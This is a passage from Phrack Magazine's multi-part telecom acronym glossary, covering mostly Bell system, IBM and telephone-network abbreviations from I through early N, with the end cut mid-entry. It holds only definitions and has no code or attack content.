engineering and administration ITF Integrated test facility ITG Intergrated traffic generator ITIMS Integrated transportation information management system ITIMS/IE Itims/information expert ITM Cable pair item number ITNA Improves thrid number acceptance ITNO Item number ITS Institute of telecommunication science ITS Integrated test system ITS Interactive training system ITSE Incoming trunk service evaluation ITSO Incoming trunk service observation ITSTC Information technology steering committee (cen ITT Idle trunk test ITU International telecommunication union ITU International telecommunications union ITVSE Intermediary transport vendor service center ITW Instructional technology workshop IU Network/port interface unit IUP Installed user program (IBM) IVD Integrated voice data IVP Installation verification procedures IVP Installation verification program IVTS International video teleconferencing service IWF Interworking facility (gateway) IWU Interworking unit (gateway) IX Interactive executive IXC Or icinterexchange carrier IXM Interexchange mileage IZ Interzone ==Phrack Magazine== Volume Four, Issue Forty-Three, File 23 of 27 {Acronyms Part III} J Enter centrex (CTX) or multiline hunt group (MLHG) number JAD Joint application design JAM Jumper activity management JCL Job control language JDC Japan digital cellular JDC Job duties code JDI Job disposition indicator JDIP Jmos/dopac interface process (comptroller system) JE Job evaluation JEC Journal entity code JES Job entry subsystem (IBM) JES Job entry system JES 2 Job entry system 2 (IBM) JES 3 Job entry system 3 (IBM) JET BTL TIRKS jumper evaluation technique JFC Job function code JGF Junctor grouping frame JIB Job information block (VMS) JIM Job information memorandum JIS Jurisdictional interstate services JK Jack JKLAP Jack/key/and lamp access panel JL Jumper length JMOS Job management operations system JMOS/PT JMOS/pricer-tracker JMOS/RPTS JMOS reports JMOSCA Jmos contract administration JMX Jumbogroup multiplex JOSS Job order status system (distribution services system) JOSSVM Job order status system/VM JOVIAL Jule's own version of the international algebraic language JP71 Joint practice 71 JP80 Joint practice 80 JPH Jumper placement history JSC Job status code JSN Junction switch number JSW Junctor switch JTR Jitter JTRS JMOS trouble reporting system (distribution services system) JUICE JMOS user input card entry (distribution services system) K DACS-SRDC K Equipment frame designation K Kilobit KBPS Kilobits per second KCA Key contributor award KCO Keep cost order KD Keyboard display KDROP Key display receive only printer KDT Keyboard display terminal KERMIT Kermit KEY Stop hunt or random make busy hunting KFT Kilofeet KHZ Kilo-hertz KHZ Kilohertz KITSKOTS Kansas inward toll service/Kansas outward toll service KOHM Kilohms KOP Thousands of operations per second KP Key pulse KPR Killer pair report KSDS Key sequence data set (IBM) KSM Create a transaction mask KSR Keyboard send-receive KSU Key service unit KTA Korea telecommunication authority (ROK) KTS Key telephone set KTS Key telephone system KW Keyword L Shift preference (if any) for this work to be performed. L/AOS Legal/advanced office system L2DOWN Level 2 is inoperable. L2QLTY Poor level 2 transmission quality. L3-ERC Layer 3 error control (IOS) L3M Layer 3 mgr. (IOS) LA Local area data channel INTER/TRA blocal 1-26 LA Loop assignment LAC LAN application controller LAC Loop assignment center LAD Label definition LAD Loop activity data LADS Local area data service LADT Local access data transport LADT Local area data transport LAI Line equipment assignment inquiry LAIS Local automatic intercept system LAJMS Ledger and journal maintenance system LAMA Local automatic message accounting LAMA-C Computerized local AMA for No. 5 crossbar LAN Local area network LANMS Light amplified by stimulated emission of radiation LAP Link access protocol LAPB (LAP-B) link access procedure of balanced mode LAPD (LAP-D) link access procedure of D-channels LAPD Link access procedure on the D channel LAPM (LAP-M) link access protocol for modems LAPX Lapb extended (t.71) LARG Lidb access routing guide LASS Local alarm scanning system LASS Local area signaling service LAT Local access termianl (RMS-D1) LATA Local access and transport area LATA Local access and transport areas LATA Local access transport area LATIS Loop activity tracking information system LATIS I/F Loop activity tracking information system interface LATIS/INPUT Locally developed program used to input to the latis system LB Voice-non switched line-service code for LATA access LBBD Loopback B1 LBI Load balance index LBK Loop test (SARTS command) LBK Loopback LBL Online tape label printing LBNCGI LIDB BNS message with call gapping indicator present LBNGM LIDB BNS garbled message LBNMGM LIDB BNS return value missing group or misrouted LBNNAN LIDB BNS return value no translation for an address of such nature LBNNCG LIDB BNS return value network congestion LBNNFL LIDB BNS return value network failure LBNNPG LIDB BNS return value nonparticipating group LBNNSA LIDB BNS return value no translation for this specific address LBNREJ LIDB BNS reject message received LBNSCG LIDB BNS return value subsystem congestion LBNSFL LIDB BNS return value subsystem failure LBNTO LIDB BNS message missed because of timeout LBNUP LIDB BNS message with unexpected reply LBNUUR LIDB BNS return value unequipped user LBO Line buildout LBP Load balance parameters LBR Large business remote LBRV Low bit rate voice LBS Land and building system LBS Load balance system LBS Load balance system (BTL) module of tnds LBST Loopback device signature table LBU Loopback devices signature table LBU Loopback unit LBn Loopback channel bn request (command in IOM2 monitor and EOC) LC Line card LC Line count LC Output line count LC Pending service order count LC Voice-switched line-service code for LATA access LCAMOS Loop cable administration and maintenance operations system (predictor) LCC Line class code LCCIS Local common channel interoffice signaling LCCL Line card cable LCCLN Line card cable narrative LCD List cable summary LCDCGI LIDB CCRD message with call gapping indicator present LCDGM LIDB CCRD garbled message LCDMGM LIDB CCRD return value missing group or misrouted LCDN Last called directory number LCDNAN LIDB CCRD return value no translation for an address of such nature LCDNCG LIDB CCRD return value network congestion LCDNFL LIDB CCRD return value network failure LCDNPG LIDB CCRD return value nonparticipating group LCDNSA LIDB CCRD return value no translation for this specific address LCDR Local call detail recording LCDREJ LIDB CCRD reject message received LCDSCG LIDB CCRD return value subsystem congestion LCDSFL LIDB CCRD return value subsystem failure LCDTO LIDB CCRD message missed because of timeout LCDUP LIDB CCRD message with unexpected reply LCDUUR LIDB CCRD return value unequipped user LCE Line concentrating equipment frame LCEN Line card equipment number LCI LAN CPU interface LCIE Lightguide cable interconnection equipment LCLOC Line card location LCM Line concentrating module LCMC Line concentrating controller module LCN Logical channel number LCN Logical channel numbers LCOS Line Class of service (GTE) LCP Language conversion program LCP List cable pairs LCR Least cost routing LCR Line concentration ratio LCRMKR Line card remarks LCS.MIT.EDU Telecomm digest archive site on the Internet LCS7 Link controller for signaling system No.7 LCSE Line card service and equipment LCSEN Line card service and equipment narrative LD Load LD Loading division LD Long distance LD Voice switched trunk-service code for LATA access LDBM Listing data base maintenance LDES Long distance experimental schedule LDM Logical data model LDMTS Long distance message telecommunications service LDN Listed directory number LDS Local digital switch LDSU2 Local digital service unit - model 2 LDT Local display terminal LDU Long distance usage analysis LE Leading edge (bsp) LE Line equipment LE Local exchange (contains D-CTL) LE Voice and tone-radio landline-service code for LATA access LEAD Loop engineering assignment data LEAP System testing tool to simulate multiple 3270 users LEAS Lata equal access system LEC Local exchange carrier LED Last entry data LED Light emitting diode LED Light-emitting diode LEE Nac related line equipment transfer order establishment LEFTS Loop electronic forecasting and tracking system LEG Customer training file LEIM Loop electronic inventory module LEIM Loop electronics inventory module LEIS Loop engineering information system (applications) LEN Line equipment number LENCL Line equipment number class LENG Length LERG Local exchange routing guide LET Line equipment transfers LETS Law enforcement teletypewriter service LEV Level LEW Line equipment transfer withdrawal LF Data low-speed-service code for LATA access LF Lease file LF Line Finder LF Line feed LF Line finder LF Load factor LF Low frequance LFACS Loop facilities assignment and control system LFACS Loop facility assignment and control system LFC Load factor calculation LFR Line failure report LFRC Local field reporting code LG Basic data-service code for LATA access LGC Line group controller LGN List hunt groups LH Line hunting (i.252 f) LH Voice and data-psn access trunk-service code for LATA access LI Length indicator (SS7) LI Link interface LIB Line interface board LIDB Line information data base LIDB Line information database LIE Left in equipment LIFECOST Life cycle cost system LIFO Last in LIJ Left In Jumper LIM Less than the specified number of pairs LIN Line LIN Transmit alit data to COSMOS LINCS Lan integrated network communications system LINIS Line and number inventory system LINK Loop interface network LINK1 The basic rate interface transmission extension (BRITE) link one is down LINK2 The BRITE link two is down. LINK3 The BRITE link three is down. LINK4 The BRITE link four is down. LINK5 The BRITE link five is down. LINK6 The BRITE link six is down. LIS Library information system LIST Listen LIT Line insulation test LIT Line insulation testing parameters LIU Lats interface unit LIU Line interface unit LIU Line user interface LJ Voice and data ssn access-service code for LATA access LK Voice and data-ssn-intermachine trunk-service code for LATA access LKNODE Link node LL Logical link LL Long distance terminal line INTER/TRA blocal 1-26 LL Long lines LLC Line load control LLC Low level controller sipx6100 LLD Low level device drivers (IOS) LLDB Location life data base LLF Line link frame LLID Ll identifier LLL Last look logic LLN Line link network LLN Line link network (ess) LLP Link layer protocol (lapd) LLS Local Line Switch (GTE) LME Line module equipment LMMS Local message metering system LMOS Loop maintenance operations system LMOS Loop maintenance operations systemr LMOS F/E Loop maintenance operations system front end LMOS HOST Loop maintenance operations system host LMOS I/F Loop maintenance operating system interface LMS Litigation management system LMS Loop maintenance system LMS/TUM Local measuring system/temporary usage measurement LMT Local maintance operations system LMTS Limits LMU Line multiplexer unit LMX L-multiplex LN Data extension LN Leased network LN Loop normal (on-hook normal) LNA Line and number administration LNA Low noise amplifier LNBAS Call failed due to the query being blocked at the switch LNBN Call failed due to the query being blocked in the CCS network LNG Longitudinal LNS Line number status LO Low threshold LOA Limit operator attempts LOAD Listing of acronym definition LOC Local LOC Local operating company LOC Location of cable on frame LOCAP Low capacitance LOCN Location LOE List originating line equipment LOE Location operating entity LOES Lajms online entry system LOF Lock off-line LOF Loss of frame LOGIC Logistics integrated control system LOGU Logical units assignments LOMS Loop assignment center operations management system LON Lock on-line LONALS Local off-net access lines LP Telephoto/facsimile-service code for LATA access LPA Link pack area LPBK Looped back LPCDF Low profile combined distributing frame LPCDF Low profile conventional distributing frame LPIE Loop plant improvement evaluator LPIE2 Loop plant improvement evaluator 2 LPK Line concentrating equipment line packs LPM Lines per minute LPM Logistic planning module LPS Log/print status LPT Loop test LQ Voice grade customized-service code for LATA access LR Loop reverse (off-hook normal) LR Protection relay-voice grade-service code for LATA access LRAP Long route analysis program LRC Longitudal redundancy check LRC Longitudinal redundancy check LRIA1 Long run incremental analysis i LRISP Long range information systems planning organization LRM Line resource monitor-ims (BMC) LRN Local reference number LROPP Long-rangeoutside plant planning LROT OR LRH Local rotary LRP Long rang planning LRS Lease record system LRS Line repeater station LRSS Long range switching studies LS Local service INTER/TRA blocal 1-26 LS Loop start signaling LS&E Local service and equipment LSA Local security administrator LSA Local subaccount LSB Lower side band LSBS Location specific bypass system LSD&F Local switching demand & facility data base system LSDB Listing service data base LSDF Local switching demand and facility data base system LSDN Local switched digital network LSE Line and station transfer order establishment LSEC Loss of sec (C/I channel code) LSHF Message LAN shelf LSI Large-scale integrated circuitry LSL Loss of signal level (C/I channel code) LSM Load synchronization mechanization LSM Local switching module LSN Logical session number LSO Local service office LSO Local storage option-ims (IBM) LSRP Local switching replacement planning LSRP Local switching replacement planning system LSS Lata switching systems LSS Listing service system LSS Listing services system LSS Loop switching system LSSGR Lata switching systems generic requirements LSSI Local special service inventory LSSR Local special service results LSSU Link state signal unit (SS7) LSSU Link status signal unit LST Line and station transfer LSU Line switch unit LSU Local storage unit LSU Loss of signal level of u interface (C/I channel code) LSUE Lsu error condition (C/I channel code) LSV Latch switch verification LSV Line status verifier LSW Line and station transfer withdrawal LT Lata tandem LT Line termination LT Local terminal LT Long distance terminal trunk INTER/TRA blocal 1-26 LT-S Lt on s bus LT-T Lt on t interface LTAB Line test access bus LTB Last trunk busy LTC Line trunk controler LTC Local test cabinet LTD Local test desk LTD Local test desk (#16 LTD Long term disability LTD Lt disable (C/I channel code) LTERM Logical terminal-ims (IBM) LTF Light terminal frame LTF Lightwave terminal frame LTF Lightwave terminating frame LTF Line trunk frame LTG Line translation group LTG Line trunk group LTI Loop termination identifier LTMA Lightwave terminal multiplex assembly LTMA Lightwave terminating multiplexing assembly LTN List telephone numbers LTOP Long term disability plan LTP Line and trunk peripherals LTP Local test port LTP Loop technology planning LTS Loss test set LTU Line trunk unit LTUC Ltu control LU Line unit LU 6.2 Protocol for appc LU2 Line unit model 2 LUA Link up america tracking LUCHBD Line unit channel board LUCOMC Line unit common control LUHLSC Line unit high level service circuit LUIF Living unit interface file LUM Line utilization monitor-ims (BMC) LUPEX Line unit path exerciser LURR Large user reproduced records system LV Sdlv LVL1ERR Level 1 protocol error. LVL2ERR Level 2 protocol error. LVL3ERR Level 3 protocol error. LVM Line verification module LW-SSS Lightwave system support services by weco LWC Leave word calling LX 2 Local originating LX 2 Local terminating LXE Lightguide express entry LZ Dedicated facility-service code for LATA access M Latest date that this ticket can be loaded. M M(transmit) signal lead M Maintance M Minutes M LETTER Methods letter M O Master office M S Main station M S Mark sense M&P Methods and procedures M-MONEY Maintenance money M-STARS Measurement and statistics tracking and reporting system M/ATR Maritime/aviation tracking reports M/W Microwave M5 Five-minute MA Cellular access trunk 2-way INTER/TRA blocal 1-26 MA Maintenance administrator MA Multiple access (primary) MA02 Status requested MA03 Hourly report of system circuits and units in trouble MA04 Reports condition of system - 1AESS maintenance MA05 Maintenance interrupt count for last hour - 1AESS maintenance MA06 Scanners MA07 Successful switch of duplicated unit (program store etc.) - 1AESS MA08 Excessive error rate of named unit -1AESS maintenance MA09 Power should not be removed from named unit - 1AESS maintenance MA10 Ok to remove paper - 1AESS maintenance MA11 Power manually removed from unit - 1AESS maintenance MA12 Power restored to unit - 1AESS maintenance MA13 Indicates central control active - 1AESS maintenance MA15 Hourly report of # of times interrupt recovery program acted - ma MA17 Centrex data link power removed - 1AESS maintenance MA21 Reports action taken on mac-rex command -1AESS maintenance msg MA23 4 minute report- emergency action phase triggers are inhibited MAB Metallic access bus MAC Machine administration center MAC Major accounting center MAC Mechanized assignment control (BTL) MAC Missed appointment code MAC Monitor analysis & control of fa standard values MACBS Multi-access cable billing system MACS Major apparatus and cable system MACS Mechanized analysis of customer systems MACS(DS) Major apparatus control system (dist. svcs) MADN Multiple access directory numbers MADPE Address parity error MAEC Media access error counter MAI Multiple access interface (univac) MAILLOG Manager electronic mail logging system MAINT Maintenance MAINT Maintenance handler MAL Maintance action limits MAL Manual assignment list MALRU Mechanized automatic line record update MALT Maintence transmission action limit table MAMA Mechanized automatic message accounting MAMA Mobile automatic message accounting MAN Manual MAN Metropolitan area network MAN Miscellaneous account number MAP Maintance and administration position MAP Maintenance and administration position MAP Maintenance and administrative position (NTI) MAP Management assessment program MAP Manual assignment parameters MAP Manufacturing automation protocol MAP Mobile application part MAPCI Map command interpreter (NTI) MAPPER Maintain and prepare executive reports MAPS Mechanized accounts payable system MAPS Modeling and planning system (BTL) MAPSS Maintenance & analysis plan for special services MAPSS Maintenance and analysis plan for special services MAQ Manual assignment file inquiry MAR Market analysis report (BTL) MAR Microprogram address register MAR Multi-alternate route MARC Market analysis of revenue and customers system MARC Market analysis of revenues and customers MARC/CAPS Market analysis of personnel and customer analysis profile MARCH A computer system MARG Margin Parameter MARK Mechnized Assiment Record Keeping System (GTE COSMOS) MARK IV General purpose information storage and retrieval system MARS Mechanized automative repair system MARS Multiple access repair system MAS Interfacesmessage analysis sampling plan MAS Main store MAS Mass announcement system (900 service) MAS Memory administration system MASB Mas bus MASC Mas controller MASM Mas memory MAST Mail analysis and sales tracking MAT Manual assistance tag MAT Metropolitan area trunk MATFAP Metropolitan area transmission facility analysis program MATR Maritime/aviation tracking system MATR Modified answering time recorder MATS Marketing access tracking system MATS Mechanized analysis of traffic studies system MAVIS McDonnel Douglas automatic voice information system (model 1018t) MAX Maximum MAX Maximum messages MAX Maximum percentage value of entity fill or maximum ccs value MAXS Metallic automatic cross-connected system MAY Modify an assembly MB Make busy MB Make-busy or made-busy MB/S Megabits per second. MBO Management by objectives MBP Metallic bypass pair MBPS Megabits per second MBX Measured branch exchange MBYTE Megabyte MC Machine congestion MC Maintance connector MC Maintenance center MC Maintenance circuit MC Marker class of service MC Memory controller MCA Misrouted centralized automatic message accounting (MDII) MCAS Material cable administrative system MCB Message control bank (sperry) MCC Maintance control center MCC Maintenance control center MCC Manual camera control MCC Master control center MCC Minicuster controller MCCI Mechanized customer contact index MCCRAP Master control center trouble report analysis plan MCCS Mechanized calling card service MCE Establish a maintenance change ticket MCH Maintenance channel MCH Manually change hunt MCHB Maintenance channel buffer MCI Malicious call identification (i.251 g) MCI Microwave communications incorporated MCIAS Multi-channel intelligent announcement system MCIAS Multi-channel intercept announcement system MCINT Mate control interrupt MCL Maintenance change list MCN Machine congestion level # where MCI=machine congestion level MCN Master control number MCN Metropolitan campus network MCOS Multiplexer out of synchronization MCP Mechanized credit provisioning system MCR Establish a maintenance change repair MCR Mass call register MCS Master cpu subsystem MCS Meeting communications service MCS Multiple console support MCTAP Mechanized cable transfer administration plan MCTRAP Mechanized customer trouble report analysis plan MCTSI Module controller/time slot interchange MCTSI Module controller/time-slot interchange unit MCW Maintenance change ticket withdrawal MD SS7fe message distributor MD/RS Mechanized denial/restoral system MDACS Modular digital access control system MDC Manually disconnect a working circuit MDC Marker distributor control MDC Materials distribution center MDC Meridian digital centrex MDCMES Management development center mechanized enrollment system MDF Main distributing frame MDF Main distribution frame MDII Machine detected interoffice irregularities MDII Machine-detected interoffice irregularity MDIS Marketing data interface system MDLIE DLI interface error MDOG Mechanized disbursement of gasoline MDP SS7 fe message distribution protocol MDR Mechanized draft reconciliation MDR Message detail record MDS Message design systems MDT Management development/training MDU Marker decoder unit MDX Modular digital exchange ME Management employment ME & ASSM Management employment & assessment ME CORP Corporation management employment MEANS Model for economic analysis of network service MEAS Measure MEASMT Measurement MEC Maintenance engineer center MEC Manually establish a circuit MEC Mobile equipment console MECA Mechanization of engineering & circuit provisioning MECAB Multi exchange carrier access billing MECCRRF Mechanized credit reference system MECH More efficient call handling MECOD Multiple exchange carrier ordering and design MED Medium threshold MED Multipoint end-link data MEDPLUS Medicare part b reimbursement payments MEDS Mechanized expense distribution system MEF Master employee file MELD Mechanized engineering and layout for distributing frames MEP Medical expense plan MERITS Measurement of exchange records integrity through sampling MERP Mechanization of estimate results plan MERS Most economic route selection MERT Master employee record tape MESA Mechanized edits of street address MESS Message MET Multibuton electronic telephone MET Multibutton electronic telephone METASX Metallic access MF Mainboard firmware (IOS) MF Multi frame MF Multi frequency MF Multifrequency MF Multiplexer frame MFAS Mechanized forecasting and analysis system MFC Master file directory (VMS-catalog of UFDS) MFC Modular feature construction MFC Multiple frame operation control (IOS) MFENET Magnetic fusion energy network MFFAN Miscellaneous frame (CM2 offices only) MFJ Modification of final judgement MFJ Modification of final judgment MFJ Modified final judgment (consent decree) MFR Discmanufacture discontinued MFR Mechanized force report MFR Multi-frequency receivers MFRS Management force reporting system MFS Message formatting service-ims (IBM) MFT Metallic facility terminal MFT Multiprogramming with a fixed number of tasks MG Marker group MG Marker group number MG Mastergroup MGB Main ground bus MGB Master ground bar MGBAF Maintenance group blocking acknowledgment failure MGR Manager MGSC Message service customer counts MGSG Message service multi-line hunt MGT Mastergroup translator MGUAF Maintenance group unblocking acknowledgment failure MH Modified huffman code (fax) MHD Moving head disk MHD Moving head disk drive(s) used in the am. MHDC Moving head disk control MHDDC Moving head disk data/clock MHS Message handling service MHS Message handling system MHZ Megahertz MI Machine interface MI Message interface on the MI Swbt minimal input MIAS Marketing information analysis system MICA Mechanized intercompany contract administration MICC Minicluster controller MICE Modular integrated communications environment MICI Mechanized independent company input MICR Minimal input customer records MICRO/TEL Micro/tel force analyzer MICS BTL maintenance space inventory control system MICU Message interface and clock unit MICU Message interface clock unit MID Master interim design MIFM Mechanized installation force management MIG Mechanized interval guide system MIIS Management inventory information system MIMIC Mts-wats intrastate model for incremental cost MIN Minimum MIN Minimum percentage value of entity fill or minimum CCS value MIN Mobile identification number MINX Multimedia information network exchange MIOIO I/O invalid operation error MIOLE I/O lock error MIOPE I/O bus parity error MIOTO I/O timer time out error MIOUE I/O unlock error MIP Microprocessor interface port MIPP Management surplus income protection plan MIPS Million instructions per second MIR Micro-instruction register MIRA Maintenance input request administrator . MIRA Mark iv information retrieval aid MIS Management information system MIS Mechanized intercepting system MIS/C Management information system/computer MISC Miscellaneous MISCF Miscellaneous frame MISS Management information staffing system MITS Microcomputer interactive test system MIU Metallic interdace unit MIZAR Management job evaluation MJEC Multiple job function codes MJF Modified final judgement MJU Multipoint junction unit MKBUSY Make busy. MKR Marker MKTG Marketing ML Matching loss MLAC Manual loop assignment center MLC Miniline card MLC Monitor level code MLCD Multi-line call detail MLH Multiline hunt MLHG Multi-line hung group MLHG Multiline hunt group MLI Message link interface MLIIBLNG Microlink II billing MLNC Failure to match and no circuit MLPA Modifiable link pack area (IBM) MLSS Machine load service summary MLT Mechanized loop test MLT Mechanized loop testing system MLT-1 Mechanized loop testing system-1 MLT-2 Mechanized loop testing - the second generation of equipment MLT-2 Mechanized loop testing system-2 MMA Multi-module access unit (Univac) MMC Manually modify a circuit MMC Minicomputer maintenance center MMEME Memory system error MMG Minicomputer maintenance group MMGT Multimastergroup translator MMI Man-machine interface MML Man machine language MMM Message mile minute MMOC Minicomputer maintance operation center MMOC Minicomputer maintenance operations center MMOCS Minicomputer maintenance and operations center system MMP Module message processor MMPP Mechanized market programming procedures (BTL) MMRCS Minicomputer maintenance and repair center system MMS Main memory status MMS Memory management system MMS/SSII Marketing measurement system/support system II MMS43 Modified monitoring state 43 code MMSU Modular metallic service unit MMT Multiple message threshold MMU Memory management unit (IOS) MMX Mastergroup multiplex MN02 List of circuits in trouble in memory MNP Microcom networking protocol MOC Machine operations center MOC Maintenance and operations console MOC Maintenance operation console MOC Ministery of communication MOC Moe order completion MOD Ministery of defense MOD Modifier MOD Modulated MOD Module number MOD1 Miscellaneous per SM measurements (MOD1) MODCOES Modified central office cost MODEM Modulator-demodulator MOE Mass oe transfers MOF Mass oe frame transfer listings MOG Minicomputer operations group MOI Maintenance and operation interface MOI Mizar order inquiry MOMS Missouri marketing system MON Monitor MON Monitor channel (i.e. IOM2) MON Mouth MOOSA Mechanized out of service adjustment system MOOSE Macs online organization system entry (distribution services) MOS Maintenance and operations subsystem MOS Metal oxide semiconductor MOSOP Mechanized operator services occupational payroll MOST Managing operations systems in transition MOSTED Motor vehicle/special tools expense distribution MOT&R Master office test and release circuit MOTS Mechanized operations tracking system MOU Minutes of use MOU-AS The annual study module of DRP/MOU MOU-DA The data accumulation module of DRP/MOU MOVE Move remote line Concentrating module MOW Moe order withdrawal MP Maintance POSITION MP Message processing program MP Microprocessor MP Multi-processor MPAP Management potential appraisal plan MPC Marker pulse conversion MPC Messages per customer MPC Mp command MPCG Message processing clerical guide MPCH Main parallel channel MPDB-OS Outside plant-pair gain MPDBCOAR MPDB-central office equipment and repair services MPDBSRVC Office supplies computers and other services MPDU Message protocpl data units (x.411) MPES Message processing entry system MPFRS Mechanized project force requirement system MPI Mechanized project impact system MPK Modify work package MPLR Mechanized plant location records system MPLUM Mechanized plant utilization management MPN Master work package number MPOOS Modem pool line out of service. MPOW Multiple purpose operator workstation MPPD Multi-purpose peripheral device MPRIN Mate peripheral interrupt MPS Mechanized pension system MPS Misplaced start pulse MPS Misplaced start pulse (MDII) MPT Message transfer part MPTS Market planning and tracking system MQ Metalic customized-service code for LATA access MQH Marker queue high MQL Marker queue low MR Maintenance request (BTL) MR Measured rate MR Message rate (BSP) MR Message register MR Message register COSMOS command MR Modified read (relative element address designate MR Monitor read (flow control bit in IOM2) MR/IBPS Management report/integrated budget and planning system MRAA Meter reading access arrangement MRCS Modification request control system MRDB Memory resident data base MRDYT Ready time out MRF Maintenance reset function MRF Message refusal received (outgoing) MRF Message retention file MRFA Mechanized repair force administration MRFF Master reference frequency frame MRFIS Mechanized request for information systems MRO Message register option MRP Mechanized revenue planning system MRPS Mobile radio priority system MRR Mandatory review reporting MRS Management reporting system (TNDS) MRSELS Microwave radio & satellite eng. & lic MRTI Message-rate treatment index (AMA NTI) MRTS Mechanized real time tracking system MRTTA Message recording trunk trouble analysis MRWPE Read or write parity error MS Machine screw (BSP) MS Maintenance state MS Measured service MS Mechanized scheduling MS Memory subsystem MS Menue software (sipb.exe) MS Microseconds MS6E Message switching #6 equipment MS7E Message switching #7 equipment MSA Management science america MSAG Master street address guide MSC Media stimulated calling MSC Minimum service charge MSCP Mass storage control protocol MSCS Management scheduling and control system MSCU Message switch control unit MSCU Message switch controller unit MSDS Material safety data sheet system MSFDB Market share forecast data base MSGBUF Message buffer MSGCLS Message class MSGLOCK Message lock MSGNO Message number MSGP Microcomputer support group programming MSGS Message switch MSK Output a transaction mask MSKMR Mate reset MSM Multi-state marketing system MSMTCH Mismatch. MSN Multiple subscriber number (i.251 b) MSORS Mechanized sales office record system (BTL) MSP Management salary plan MSP Metropolitan service plan MSPR Message switch peripheral unit MSR Marketing surveys and reports MSR Mechanized sales results system (mbt directory sales) MSR Mechanized service record MSR Mizar status report MSR/DIS Mechanized service record/disability subsystem MSS Mass storage system MSS Mss is a dialup for... database of 1800 numbers... MSSS Mechanized supply stock system MSTIC Mechanized standard time increments (we/eplans) MSTS Measured service tracking system MSU Message signal unit MSU Metallic service unit MSU Msg. signal unit (SS7) MSUCOM Metallic service unit common MSUS Measured service usage studies MSUSM Subunit select mismatch MT Master record tape unit number or tape drive to write MT Wired music INTER/TRA blocal 1-26 MTA Message transfer agent (x.400) MTAE Message transfer agent entity (x.400) MTB Magnetic tape billing MTB Metallic test bus MTC Facs maintenance transaction MTCE Maintenance (default). MTCE Maintenance parameters MTD Magnetic tape drive MTD Mutilated digit MTD Mutilated digit (MDII) MTECS Iimechanized toll error correction system phase ii MTECS Mechanized toll error correction system MTEL Main telephone MTF Master test frame MTH Magnetic tape handler MTIB Metallic test interconnect bus MTIBAX Metallic test interconnect bus access MTINT Miscellaneous timer interrupt MTL Maximum termination liability MTLR Mechanized trouble log report MTLT Maintance transmission action limit table MTM Maintenance trunk module (NTI) MTO Master terminal operator MTP Management transitional program MTP Message transfer part (SS7: q.701-q.710) MTP Message transfer part. MTP Message transfer protocol (x.411: p1) MTR Manually test a response MTR Mechanized time reporting MTR Tape drive to read MTRS Marketing or management time reporting system MTRS Mechanized training records system MTRS/FCC Management time reporting system/fcc report MTRT Mate ready time out MTS Manual test system MTS Memory time swich peb2040 MTS Message telecommunications service MTS Message telecommunications system MTS Message telephone service MTS Message teleprocessing system MTS Message toll service MTS Mobile telephone service MTSC MTS CMOS (512 incoming channels) MTSDB Message telecommunications services data base MTSI Msg telecommunications ser price index MTSL MTS large (1024 incoming channels) MTSO Mobile telephone switching office MTSS MTS small (256 incoming channels) MTTP Master trunk test panel MTU Magnetic tape unit parameters MTU Maintenence termination unit MTU Media tech unit MTW Tape drive to write MTX Mobile telephone exchange MU Maintenance usage MU Message unit MUC Material usage code MULDEM Multiplexer-demultiplexer MULT Multiple MUM Measured unit message MUNICH Multichannel (32) network interface controller MUPH Multiple position hunt MUSAC Multipoint switching and conferencing unit MUSIC Modeling for usage sensitive incremental costs MUT Miniaturized universal trunk frame MUT Multi-unit-test MUX Multiplex MUX Multiplexer MVAS Motor vehicle accident summary MVCCW Commstar ii call waiting USOC MVP Multiline variety package MVS Multiple virtual storage MVS Multiple virtual storage operating MVS/MODS TSO display operator messages from programs running under MVS/SP Multiple virtual storages/system product operating system MVS/SPA Multiple virtual storages/system product assist operating MVS/XA Mutliple virtual storage/extended architecture MVT Multiprogramming with a variable number of tasks MVTC Motor vehicle type code MW (ger) service word MW Mandatory work MW Multiwink MWCP Mechanized wire centering program (BTL) MWI Message waiting indicator MWPER Write protect error MX Monitor transmit (flow control bit in IOM2) MXU Multiplex units MXU Multiplexer unit ==Phrack Magazine== Volume Four, Issue Forty-Three, File 24 of 27 {Acronyms Part IV} N Estimated time to complete this ticket. N No corrective action N(R) (NR) receive sequence number N(S) (NS) transmit sequence number NA CSACC link (EPSCS) INTER/TRA blocal 1-26 NA Next address NA Normal alignment NAAP New affirmative action program NAB Network analysis bureau NAC Network administration center NAC Network application center NAC Non-area code NACK No ground acknowledgment received on a ground start private facility (FX) trunk NAFMAP Network administration force management and productivity NAG Network architecture group NAI Telephone number assignment inquiry NAK Negative acknowledge NAM Number assignment module NAND Not-and gate NANP North american numbering plan NAP Network access pricing NAP Network analysis program (BTL) NAR Nac assignment review NARS National yellow pages services accounts receivable system NAS Network analysis system NAS Numerical and atmospheric sciences network NAS/CARS Network analysis system/central analysis report system NAS/SRS Network analysis system/subscriber recording system (MBT) NASS Network adminstration support system NATL National code (NTI) NAUG Network administration user group NB Narrow band NBSY Number of busy (trunks) (NTI) NC CNCC link (SPSCS) INTER/TRA blocal 1-26 NC Network channel NC No circuit NCA No circuit announcement NCAT Network cost analysis tool NCC National coordinating center (national emergency) NCC Network control center NCC Notify corrupted CRC (in EOC) NCCF Network communication control facility (IBM vtam/mcp option) NCCF Network communications control facility NCD Network call denial NCDAFTA NCD denied after answer NCDAFTA Network call denial (NCD) denied after answer NCDBEFA NCD denied before answer NCDBLKD NCD returned blocked NCDCCBL NCD code control blocked NCDDBOV NCD data base overload NCDDBOV NCD database overload NCDDENY NCD deny received NCDDSBL NCD direct signaling blocked NCDNOXL NCD returned no translation NCDOVLD NCD returned overload NCDUNEQ NCD returned unequipped NCH Noch NCI Network channel interface NCI No card issue NCLK Network clock NCLS Non-capitalized lease system NCMASTER No circuit master NCOO Network central office operations NCOS Dms 100 class of service NCOSC Network clock 2 oscillator NCOSS Network communication and operations support system NCP National control point NCP Network control point NCP Network control point (in a SDN) NCP Network control program (IBM3725 software) NCR- Sclrnetwork completion report-system called line report system NCRPAB Network cost results plan NCS National communications system NCS National communicatons system NCSPC Non-conforming stored program control NCT Network control and timing NCT (CP) Network control and timing call processing NCT LINKS Network control and timing links NCTE Digital network channel equipment NCTE Network channel terminating equipment NCTE Network channel terminating equipment (FCC NT1) NCTLNK Network control and timing link NCU Network control unit ND Network data line INTER/TRA blocal 1-26 NDA Network data analyzer NDA Network delivery access NDBS Network data base system NDC National destination code (i.e. area code) NDC Network data collection NDC Node data collection NDCC Network data collection center NDIS National dial-it services NDPCC Network data processing coordination center NDRAS Network distribution resource administration system NDS Network data system NDS Network distribution services NDS-TIDE Network data system-traffic information distributor and NDS/ANN Announcement system - System/36 NDS/BMR Bmrbudget morning report - System 36 NDS/CONAD Conadcontract administration system - System 36 NDS/FLEXNDS Flexible reporting 